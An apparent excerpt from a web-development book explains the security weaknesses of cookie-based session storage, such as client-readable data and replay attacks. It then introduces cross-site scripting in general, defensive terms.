??? Unlike the server-side session stores, the CookieStore allows the client to read all
session data. This is not usually an issue, but it can be a problem in certain cases.
Some applications require sensitive user data (such as account numbers or credit
card numbers) to be hidden even after a user is logged in, for extra security. Also
consider that the data may be stored as plain text in the browser cache on the client.
Sensitive data should be stored on the server, not in the session.
??? The CookieStore is vulnerable to replay attacks: since the cookies do not incorporate
a nonce,* a user who has a valid session can replay that session at any
later time, and convince the server that it is current. Never store transient data,
such as account balances, in the session.
Cross-Site Scripting
Cross-site scripting (XSS, to avoid confusion with Cascading Style Sheets and Content
Scramble System) is one of the most common vulnerabilities in web applications
created recently. ???Web 2.0???-style applications are particularly vulnerable due
to the shifting emphasis toward user-generated content.
XSS usually is made possible because of inadequate escaping of user-entered code,
particularly in blog posts, comments, and other user-generated content. In an XSS
attack, an attacker inserts code, particularly JavaScript, into a third-party site (the
target) in such a way that the browser treats it as part of the target page for security
purposes.
Pages:
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218